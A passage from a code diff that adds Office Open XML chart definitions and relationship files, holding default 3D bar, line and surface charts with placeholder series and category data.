<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="../embeddings/Microsoft_Office_Excel_Worksheet3.xlsx"/>
</Relationships>

View File

@ -0,0 +1,4 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="../embeddings/Microsoft_Office_Excel_Worksheet4.xlsx"/>
</Relationships>

View File

@ -0,0 +1,4 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="../embeddings/Microsoft_Office_Excel_Worksheet5.xlsx"/>
</Relationships>

View File

@ -0,0 +1,4 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="../embeddings/Microsoft_Office_Excel_Worksheet6.xlsx"/>
</Relationships>

View File

@ -0,0 +1,230 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
<c:lang val="en-US"/>
<c:chart>
<c:view3D>
<c:perspective val="30"/>
</c:view3D>
<c:plotArea>
<c:layout/>
<c:bar3DChart>
<c:barDir val="col"/>
<c:grouping val="standard"/>
<c:ser>
<c:idx val="0"/>
<c:order val="0"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$B$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 1</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$B$2:$B$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>4.3</c:v>
</c:pt>
<c:pt idx="1">
<c:v>2.5</c:v>
</c:pt>
<c:pt idx="2">
<c:v>3.5</c:v>
</c:pt>
<c:pt idx="3">
<c:v>4.5</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:ser>
<c:idx val="1"/>
<c:order val="1"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$C$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 2</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$C$2:$C$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>2.4</c:v>
</c:pt>
<c:pt idx="1">
<c:v>4.4000000000000004</c:v>
</c:pt>
<c:pt idx="2">
<c:v>1.8</c:v>
</c:pt>
<c:pt idx="3">
<c:v>2.8</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:ser>
<c:idx val="2"/>
<c:order val="2"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$D$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 3</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$D$2:$D$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>2</c:v>
</c:pt>
<c:pt idx="1">
<c:v>2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>5</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:shape val="cylinder"/>
<c:axId val="51657728"/>
<c:axId val="69190400"/>
<c:axId val="25292288"/>
</c:bar3DChart>
<c:catAx>
<c:axId val="51657728"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="b"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="69190400"/>
<c:crosses val="autoZero"/>
<c:auto val="1"/>
<c:lblAlgn val="ctr"/>
<c:lblOffset val="100"/>
</c:catAx>
<c:valAx>
<c:axId val="69190400"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="l"/>
<c:majorGridlines/>
<c:numFmt formatCode="General" sourceLinked="1"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="51657728"/>
<c:crosses val="autoZero"/>
<c:crossBetween val="between"/>
</c:valAx>
<c:serAx>
<c:axId val="25292288"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="b"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="69190400"/>
<c:crosses val="autoZero"/>
</c:serAx>
</c:plotArea>
<c:legend>
<c:legendPos val="r"/>
<c:layout/>
</c:legend>
<c:plotVisOnly val="1"/>
</c:chart>
<c:externalData r:id="rId1"/>
</c:chartSpace>

View File

@ -0,0 +1,220 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
<c:lang val="en-US"/>
<c:chart>
<c:view3D>
<c:rAngAx val="1"/>
</c:view3D>
<c:plotArea>
<c:layout/>
<c:bar3DChart>
<c:barDir val="col"/>
<c:grouping val="clustered"/>
<c:ser>
<c:idx val="0"/>
<c:order val="0"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$B$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 1</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$B$2:$B$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>4.3</c:v>
</c:pt>
<c:pt idx="1">
<c:v>2.5</c:v>
</c:pt>
<c:pt idx="2">
<c:v>3.5</c:v>
</c:pt>
<c:pt idx="3">
<c:v>4.5</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:ser>
<c:idx val="1"/>
<c:order val="1"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$C$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 2</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$C$2:$C$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>2.4</c:v>
</c:pt>
<c:pt idx="1">
<c:v>4.4000000000000004</c:v>
</c:pt>
<c:pt idx="2">
<c:v>1.8</c:v>
</c:pt>
<c:pt idx="3">
<c:v>2.8</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:ser>
<c:idx val="2"/>
<c:order val="2"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$D$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 3</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$D$2:$D$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>2</c:v>
</c:pt>
<c:pt idx="1">
<c:v>2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>5</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:shape val="pyramid"/>
<c:axId val="71774208"/>
<c:axId val="71776128"/>
<c:axId val="0"/>
</c:bar3DChart>
<c:catAx>
<c:axId val="71774208"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="b"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="71776128"/>
<c:crosses val="autoZero"/>
<c:auto val="1"/>
<c:lblAlgn val="ctr"/>
<c:lblOffset val="100"/>
</c:catAx>
<c:valAx>
<c:axId val="71776128"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="l"/>
<c:majorGridlines/>
<c:numFmt formatCode="General" sourceLinked="1"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="71774208"/>
<c:crosses val="autoZero"/>
<c:crossBetween val="between"/>
</c:valAx>
</c:plotArea>
<c:legend>
<c:legendPos val="r"/>
<c:layout/>
</c:legend>
<c:plotVisOnly val="1"/>
</c:chart>
<c:externalData r:id="rId1"/>
</c:chartSpace>

View File

@ -0,0 +1,230 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
<c:lang val="en-US"/>
<c:chart>
<c:view3D>
<c:perspective val="30"/>
</c:view3D>
<c:plotArea>
<c:layout/>
<c:bar3DChart>
<c:barDir val="col"/>
<c:grouping val="standard"/>
<c:ser>
<c:idx val="0"/>
<c:order val="0"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$B$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 1</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$B$2:$B$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>4.3</c:v>
</c:pt>
<c:pt idx="1">
<c:v>2.5</c:v>
</c:pt>
<c:pt idx="2">
<c:v>3.5</c:v>
</c:pt>
<c:pt idx="3">
<c:v>4.5</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:ser>
<c:idx val="1"/>
<c:order val="1"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$C$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 2</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$C$2:$C$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>2.4</c:v>
</c:pt>
<c:pt idx="1">
<c:v>4.4000000000000004</c:v>
</c:pt>
<c:pt idx="2">
<c:v>1.8</c:v>
</c:pt>
<c:pt idx="3">
<c:v>2.8</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:ser>
<c:idx val="2"/>
<c:order val="2"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$D$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 3</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$D$2:$D$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>2</c:v>
</c:pt>
<c:pt idx="1">
<c:v>2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>5</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:shape val="pyramid"/>
<c:axId val="50252800"/>
<c:axId val="50255744"/>
<c:axId val="71870208"/>
</c:bar3DChart>
<c:catAx>
<c:axId val="50252800"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="b"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="50255744"/>
<c:crosses val="autoZero"/>
<c:auto val="1"/>
<c:lblAlgn val="ctr"/>
<c:lblOffset val="100"/>
</c:catAx>
<c:valAx>
<c:axId val="50255744"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="l"/>
<c:majorGridlines/>
<c:numFmt formatCode="General" sourceLinked="1"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="50252800"/>
<c:crosses val="autoZero"/>
<c:crossBetween val="between"/>
</c:valAx>
<c:serAx>
<c:axId val="71870208"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="b"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="50255744"/>
<c:crosses val="autoZero"/>
</c:serAx>
</c:plotArea>
<c:legend>
<c:legendPos val="r"/>
<c:layout/>
</c:legend>
<c:plotVisOnly val="1"/>
</c:chart>
<c:externalData r:id="rId1"/>
</c:chartSpace>

View File

@ -0,0 +1,110 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
<c:lang val="en-US"/>
<c:chart>
<c:title>
<c:layout/>
</c:title>
<c:view3D>
<c:rotX val="30"/>
<c:perspective val="30"/>
</c:view3D>
<c:plotArea>
<c:layout/>
<c:bar3DChart>
<c:barDir val="bar"/>
<c:grouping val="clustered"/>
<c:ser>
<c:idx val="0"/>
<c:order val="0"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$B$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Sales</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Sq.. 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Sq.. 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Sq.. 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Sq.. 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$B$2:$B$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>8.1999999999999993</c:v>
</c:pt>
<c:pt idx="1">
<c:v>3.2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>1.4</c:v>
</c:pt>
<c:pt idx="3">
<c:v>1.2</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:shape val="box"/>
<c:axId val="50777472"/>
<c:axId val="50780032"/>
<c:axId val="0"/>
</c:bar3DChart>
<c:valAx>
<c:axId val="50780032"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="b"/>
<c:majorGridlines/>
<c:numFmt formatCode="General" sourceLinked="1"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="50777472"/>
<c:crossBetween val="between"/>
</c:valAx>
<c:catAx>
<c:axId val="50777472"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="l"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="50780032"/>
<c:auto val="1"/>
<c:lblAlgn val="ctr"/>
<c:lblOffset val="100"/>
</c:catAx>
</c:plotArea>
<c:legend>
<c:legendPos val="r"/>
<c:layout/>
</c:legend>
<c:plotVisOnly val="1"/>
</c:chart>
<c:externalData r:id="rId1"/>
</c:chartSpace>

View File

@ -0,0 +1,228 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
<c:lang val="en-US"/>
<c:chart>
<c:view3D>
<c:perspective val="30"/>
</c:view3D>
<c:plotArea>
<c:layout/>
<c:line3DChart>
<c:grouping val="standard"/>
<c:ser>
<c:idx val="0"/>
<c:order val="0"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$B$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 1</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$B$2:$B$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>4.3</c:v>
</c:pt>
<c:pt idx="1">
<c:v>2.5</c:v>
</c:pt>
<c:pt idx="2">
<c:v>3.5</c:v>
</c:pt>
<c:pt idx="3">
<c:v>4.5</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:ser>
<c:idx val="1"/>
<c:order val="1"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$C$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 2</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$C$2:$C$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>2.4</c:v>
</c:pt>
<c:pt idx="1">
<c:v>4.4000000000000004</c:v>
</c:pt>
<c:pt idx="2">
<c:v>1.8</c:v>
</c:pt>
<c:pt idx="3">
<c:v>2.8</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:ser>
<c:idx val="2"/>
<c:order val="2"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$D$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 3</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$D$2:$D$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>2</c:v>
</c:pt>
<c:pt idx="1">
<c:v>2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>5</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:axId val="50940928"/>
<c:axId val="68729472"/>
<c:axId val="78014208"/>
</c:line3DChart>
<c:catAx>
<c:axId val="50940928"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="b"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="68729472"/>
<c:crosses val="autoZero"/>
<c:auto val="1"/>
<c:lblAlgn val="ctr"/>
<c:lblOffset val="100"/>
</c:catAx>
<c:valAx>
<c:axId val="68729472"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="l"/>
<c:majorGridlines/>
<c:numFmt formatCode="General" sourceLinked="1"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="50940928"/>
<c:crosses val="autoZero"/>
<c:crossBetween val="between"/>
</c:valAx>
<c:serAx>
<c:axId val="78014208"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="b"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="68729472"/>
<c:crosses val="autoZero"/>
</c:serAx>
</c:plotArea>
<c:legend>
<c:legendPos val="r"/>
<c:layout/>
</c:legend>
<c:plotVisOnly val="1"/>
</c:chart>
<c:externalData r:id="rId1"/>
</c:chartSpace>

View File

@ -0,0 +1,238 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
<c:lang val="en-US"/>
<c:chart>
<c:view3D>
<c:perspective val="30"/>
</c:view3D>
<c:plotArea>
<c:layout/>
<c:surface3DChart>
<c:ser>
<c:idx val="0"/>
<c:order val="0"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$B$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 1</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$B$2:$B$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>4.3</c:v>
</c:pt>
<c:pt idx="1">
<c:v>2.5</c:v>
</c:pt>
<c:pt idx="2">
<c:v>3.5</c:v>
</c:pt>
<c:pt idx="3">
<c:v>4.5</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:ser>
<c:idx val="1"/>
<c:order val="1"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$C$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 2</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$C$2:$C$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>2.4</c:v>
</c:pt>
<c:pt idx="1">
<c:v>4.4000000000000004</c:v>
</c:pt>
<c:pt idx="2">
<c:v>1.8</c:v>
</c:pt>
<c:pt idx="3">
<c:v>2.8</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:ser>
<c:idx val="2"/>
<c:order val="2"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$D$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 3</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$D$2:$D$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>2</c:v>
</c:pt>
<c:pt idx="1">
<c:v>2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>5</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:bandFmts/>
<c:axId val="59304576"/>
<c:axId val="68746240"/>
<c:axId val="59572224"/>
</c:surface3DChart>
<c:catAx>
<c:axId val="59304576"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="b"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="68746240"/>
<c:crosses val="autoZero"/>
<c:auto val="1"/>
<c:lblAlgn val="ctr"/>
<c:lblOffset val="100"/>
</c:catAx>
<c:valAx>
<c:axId val="68746240"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="l"/>
<c:majorGridlines/>
<c:numFmt formatCode="General" sourceLinked="1"/>
<c:tickLblPos val="nextTo"/>
